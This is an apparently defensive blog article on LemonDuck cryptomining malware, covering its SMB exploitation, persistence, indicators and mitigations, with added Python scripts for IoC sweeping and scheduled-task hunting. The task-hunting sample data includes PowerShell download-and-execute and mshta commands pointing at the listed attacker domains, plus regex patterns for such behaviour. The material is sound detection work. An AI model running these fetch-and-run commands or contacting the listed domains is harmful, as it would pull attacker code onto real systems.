    LemonDuck Malware: Exploiting SMB Vulnerabilities for Cryptomining

    Introduction

    LemonDuck is a sophisticated piece of malware known for its ability to exploit vulnerabilities in Windows systems, particularly through the Server Message Block (SMB) protocol. This malware leverages the EternalBlue vulnerability (CVE-2017-0144) to infect servers, disable security systems, and convert compromised devices into cryptomining machines. Despite the availability of patches for EternalBlue, many systems remain vulnerable due to outdated software and misconfigured security protocols.

    How LemonDuck Operates

    LemonDuck initiates its attack by exploiting weak SMB services, specifically targeting the EternalBlue vulnerability, which allows unauthorized access to system resources. Here’s a breakdown of its infection process:

    1. Infiltration via SMB and Brute-Force Attacks
      LemonDuck malware first gains access through vulnerable SMB protocols or by brute-forcing administrator credentials. Once inside, it creates hidden administrative folders and runs malicious scripts like p.bat. This script manipulates firewall settings, opens TCP ports, and sets up port forwarding, allowing the malware to hide its outbound traffic under the guise of DNS queries.
    2. Malware Persistence and Stealth
      After gaining access, LemonDuck employs several techniques to evade detection. It creates an executable disguised as the legitimate svchost.exe, disables Windows Defender, and excludes critical system directories from antivirus scans. It also uses PowerShell to download additional malicious files, ensuring the malware's continued presence on the system.
    3. Scheduled Tasks for Sustained Attacks
      LemonDuck creates scheduled tasks that execute malicious scripts every 50 minutes, ensuring that the malware continues to run even after system reboots. If PowerShell is unavailable, the malware uses alternative methods like mshta to schedule tasks and ensure persistence.

    Advanced Techniques

    LemonDuck uses several advanced tactics to maintain control and hinder detection:

    • PowerShell Manipulation: LemonDuck downloads additional malicious scripts via PowerShell, creating new tasks in the system scheduler. If PowerShell is absent, it manipulates the scheduler to replace existing tasks with its own malicious versions.
    • Credential Theft and Lateral Movement: Once inside, the malware uses tools like Mimikatz to steal credentials and spread across the network. It then leverages these stolen credentials to gain higher privileges and access more sensitive parts of the system.
    • Blocking Other Threat Actors: LemonDuck doesn’t just focus on system resources; it actively seeks to block other malware from infecting the same system by deleting previously created administrative shares.

    Indicators of Compromise (IoCs)

    Organizations can detect LemonDuck by monitoring for specific indicators, including:

    • File Hashes:
      • msInstall.exe (MD5: 3ca77a9dfa6188ed9418d03df61fea7a)
    • Malicious Domains:
      • t.amynx.com
      • w.zz3r0.com
    • IP Addresses:
      • 211.22.131.99 (Taichung, Taiwan)
    • Tactics, Techniques, and Procedures (TTPs):
      • Public-Facing Application Exploitation
      • Abuse of PowerShell and the Windows command shell
      • Creation of scheduled tasks to ensure persistence
      • Disabling system defenses such as Windows Firewall
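A defender-side sweep of the indicators listed above, added here as an example and not code from the original post. It matches DNS queries against the two domains on label boundaries (so a look-alike such as amynx.com.example.org is not flagged while a subdomain of t.amynx.com is), flags firewall connections to the listed IP and, because the article notes that LemonDuck disguises outbound traffic as DNS, outbound port-53 connections to anything other than a sanctioned resolver, and compares an endpoint file inventory against the msInstall.exe MD5. The log formats, host names, the resolver address 10.0.0.53, the second file hash and every sample line are constructed for the example; only the domains, the IP and the msInstall.exe hash come from the article.

```python
import re
from dataclasses import dataclass

# Indicators quoted from the article.
IOC_DOMAINS = {"t.amynx.com", "w.zz3r0.com"}
IOC_IPS = {"211.22.131.99"}
IOC_MD5 = {"3ca77a9dfa6188ed9418d03df61fea7a": "msInstall.exe"}

# Assumption for the port-53 heuristic: the only resolver that hosts are allowed to use.
APPROVED_RESOLVERS = {"10.0.0.53"}

# Constructed sample logs (not taken from the page): one record per line, key=value fields.
DNS_LOG = """\
2024-05-01T10:00:01Z host=WS01 query=update.microsoft.com type=A
2024-05-01T10:00:07Z host=SRV02 query=t.amynx.com type=A
2024-05-01T10:00:09Z host=SRV02 query=sub.t.amynx.com type=TXT
2024-05-01T10:00:12Z host=WS03 query=w.zz3r0.com type=A
2024-05-01T10:00:15Z host=WS04 query=amynx.com.example.org type=A
"""

FIREWALL_LOG = """\
2024-05-01T10:01:00Z src=10.0.0.5 dst=211.22.131.99 dport=443 action=allow
2024-05-01T10:01:02Z src=10.0.0.6 dst=93.184.216.34 dport=443 action=allow
2024-05-01T10:01:04Z src=10.0.0.7 dst=10.0.0.53 dport=53 action=allow
2024-05-01T10:01:05Z src=10.0.0.8 dst=198.51.100.7 dport=53 action=allow
"""

# (host, path, MD5) rows as an EDR file inventory might export them. The first hash is the
# article's msInstall.exe indicator (upper-cased, as tools often report it); the second is a
# constructed placeholder for a benign file.
FILE_INVENTORY = [
    ("SRV02", r"C:\Windows\Temp\msInstall.exe", "3CA77A9DFA6188ED9418D03DF61FEA7A"),
    ("WS01", r"C:\Windows\System32\svchost.exe", "0f4f5c3b1e2d9a8b7c6d5e4f3a2b1c0d"),
]


@dataclass(frozen=True)
class Finding:
    host: str       # endpoint name or source IP, whichever the log offers
    kind: str       # "domain", "ip", "dns-port-to-unknown-host" or "hash"
    value: str      # the indicator that matched
    evidence: str   # the raw line or inventory row that produced the finding


_KV = re.compile(r"(\w+)=(\S+)")


def _fields(line):
    """Turn 'k1=v1 k2=v2 ...' into a dict; the leading timestamp has no '=' and is skipped."""
    return dict(_KV.findall(line))


def domain_matches(name, iocs=IOC_DOMAINS):
    """True when name equals an IoC domain or is a subdomain of one.

    Comparing on label boundaries (exact match or '.' + ioc suffix) avoids the false positive
    a plain substring test would raise on names like amynx.com.example.org."""
    name = name.lower().rstrip(".")
    return any(name == d or name.endswith("." + d) for d in iocs)


def scan_dns_log(text):
    findings = []
    for line in text.splitlines():
        f = _fields(line)
        q = f.get("query", "")
        if domain_matches(q):
            findings.append(Finding(f.get("host", "?"), "domain", q, line))
    return findings


def scan_firewall_log(text):
    findings = []
    for line in text.splitlines():
        f = _fields(line)
        src, dst, dport = f.get("src", "?"), f.get("dst", ""), f.get("dport", "")
        if dst in IOC_IPS:
            findings.append(Finding(src, "ip", dst, line))
        elif dport == "53" and dst not in APPROVED_RESOLVERS:
            # Port 53 to a non-resolver is the "traffic disguised as DNS" pattern the article describes.
            findings.append(Finding(src, "dns-port-to-unknown-host", dst, line))
    return findings


def scan_file_inventory(rows):
    findings = []
    for host, path, md5 in rows:
        md5 = md5.lower()  # normalise case before the lookup
        if md5 in IOC_MD5:
            findings.append(Finding(host, "hash", md5, f"{path} matches {IOC_MD5[md5]}"))
    return findings


def affected_hosts(*finding_lists):
    """Sorted, de-duplicated list of hosts that appear in any finding."""
    return sorted({f.host for fl in finding_lists for f in fl})


def run_all():
    return scan_dns_log(DNS_LOG), scan_firewall_log(FIREWALL_LOG), scan_file_inventory(FILE_INVENTORY)


if __name__ == "__main__":
    dns, fw, files = run_all()
    for finding in dns + fw + files:
        print(f"{finding.host}: {finding.kind} {finding.value}  <- {finding.evidence}")
    print("hosts to triage:", affected_hosts(dns, fw, files))
```

The port-53 heuristic is deliberately separate from the IP match so that it can be tuned (or dropped) per environment; the hash comparison normalises case because the same MD5 is routinely reported in both forms.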

    Prevention and Mitigation

    To defend against LemonDuck and similar malware, organizations should take the following steps:

    1. Patch Management
      Ensure all systems are up to date with the latest security patches, particularly those addressing SMB vulnerabilities like EternalBlue (CVE-2017-0144).
    2. Network Segmentation
      Segment network resources to limit lateral movement within the organization. Ensure that only necessary services are accessible through SMB.
    3. Credential Hygiene
      Enforce strong password policies to prevent brute-force attacks. Regularly rotate credentials, particularly for administrator accounts.
    4. Monitoring and Detection
      Deploy advanced monitoring tools to detect suspicious behavior, such as unusual traffic patterns or unexpected scheduled tasks. Monitor for IoCs associated with LemonDuck.
    5. Disable PowerShell Where Not Needed
      Restrict the use of PowerShell in environments where it is not necessary. If possible, monitor its usage closely to prevent unauthorized scripts from executing.
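The scheduled-task behaviour described under "How LemonDuck Operates" (tasks every 50 minutes that launch PowerShell or mshta) and the "unexpected scheduled tasks" called for in the Monitoring and Detection step can be hunted from an exported task list. The example below is added here and is not code from the original post. It scores each task on four signals (script interpreter in the action, fetching or evaluating remote content, hidden-window or no-profile flags, and a 50-minute repeat) and reports tasks with at least two, which keeps a legitimate PowerShell maintenance task from being reported on the interpreter signal alone. The CSV is a constructed sample in the shape of `schtasks /query /fo CSV /v` output; the column names used, the "0 Hour(s), 50 Minute(s)" wording, the task names, accounts and command lines are all assumptions, and the URL paths are placeholders.

```python
import csv
import io
import re

# Constructed sample modelled on `schtasks /query /fo CSV /v` output. Only the columns this
# example reads are kept; the column names, the "Repeat: Every" wording, the task names,
# users and command lines are assumptions, and the URL paths are placeholders.
SCHTASKS_CSV = '''\
"HostName","TaskName","Author","Task To Run","Schedule Type","Repeat: Every"
"SRV02","\\Microsoft\\Windows\\Defrag\\ScheduledDefrag","Microsoft Corporation","%windir%\\system32\\defrag.exe -c -h -k -g","Weekly","N/A"
"SRV02","\\Updater1","SRV02\\Administrator","powershell.exe -NoProfile -WindowStyle Hidden -Command ""IEX (New-Object Net.WebClient).DownloadString('http://t.amynx.com/PLACEHOLDER')""","Daily","0 Hour(s), 50 Minute(s)"
"SRV02","\\Updater2","SRV02\\Administrator","mshta.exe http://w.zz3r0.com/PLACEHOLDER","Daily","0 Hour(s), 50 Minute(s)"
"SRV02","\\Backup\\Nightly","SRV02\\svc_backup","powershell.exe -File C:\\Scripts\\backup.ps1","Daily","N/A"
'''

# Signal 1: the task action runs a script interpreter the article associates with LemonDuck.
INTERPRETER = re.compile(r"\b(powershell|pwsh|mshta)(\.exe)?\b", re.I)
# Signal 2: the action fetches or evaluates content from elsewhere.
REMOTE_CONTENT = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression|https?://",
    re.I,
)
# Signal 3: flags that hide the window, skip the profile or hide the command body.
STEALTH_FLAGS = re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile\b|-enc(odedcommand)?\b", re.I)
# Signal 4: the repeat interval the article attributes to LemonDuck's tasks.
LEMONDUCK_INTERVAL_MIN = 50


def minutes_from_repeat(text):
    """Parse '0 Hour(s), 50 Minute(s)' into 50; return None for 'N/A' or blank."""
    h = re.search(r"(\d+)\s*Hour", text)
    m = re.search(r"(\d+)\s*Minute", text)
    if h is None and m is None:
        return None
    return (int(h.group(1)) if h else 0) * 60 + (int(m.group(1)) if m else 0)


def score_task(row):
    """Return the list of reasons a task resembles the persistence the article describes."""
    action = row.get("Task To Run", "")
    reasons = []
    if INTERPRETER.search(action):
        reasons.append("runs a script interpreter (powershell/mshta)")
        if REMOTE_CONTENT.search(action):
            reasons.append("fetches or evaluates remote content")
        if STEALTH_FLAGS.search(action):
            reasons.append("hidden-window / no-profile / encoded flags")
    if minutes_from_repeat(row.get("Repeat: Every", "")) == LEMONDUCK_INTERVAL_MIN:
        reasons.append(f"repeats every {LEMONDUCK_INTERVAL_MIN} minutes")
    return reasons


def hunt(csv_text, min_reasons=2):
    """Return (task name, reasons) for every task carrying at least min_reasons signals."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        reasons = score_task(row)
        if len(reasons) >= min_reasons:
            hits.append((row["TaskName"], reasons))
    return hits


if __name__ == "__main__":
    for name, reasons in hunt(SCHTASKS_CSV):
        print(f"{name}: {', '.join(reasons)}")
```

Lowering `min_reasons` to 1 turns the hunt into an inventory of every task that launches an interpreter, which is useful as a baseline before the PowerShell restrictions in step 5 are rolled out.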

    Conclusion

    LemonDuck is a persistent threat, targeting vulnerable Windows servers through SMB exploits and brute-force attacks. Its advanced evasion techniques, combined with the ability to disable security measures and steal credentials, make it a potent tool for cryptomining. Organizations must take proactive steps to patch vulnerabilities, monitor for signs of infection, and implement strict security protocols to mitigate the risks posed by this dangerous malware.
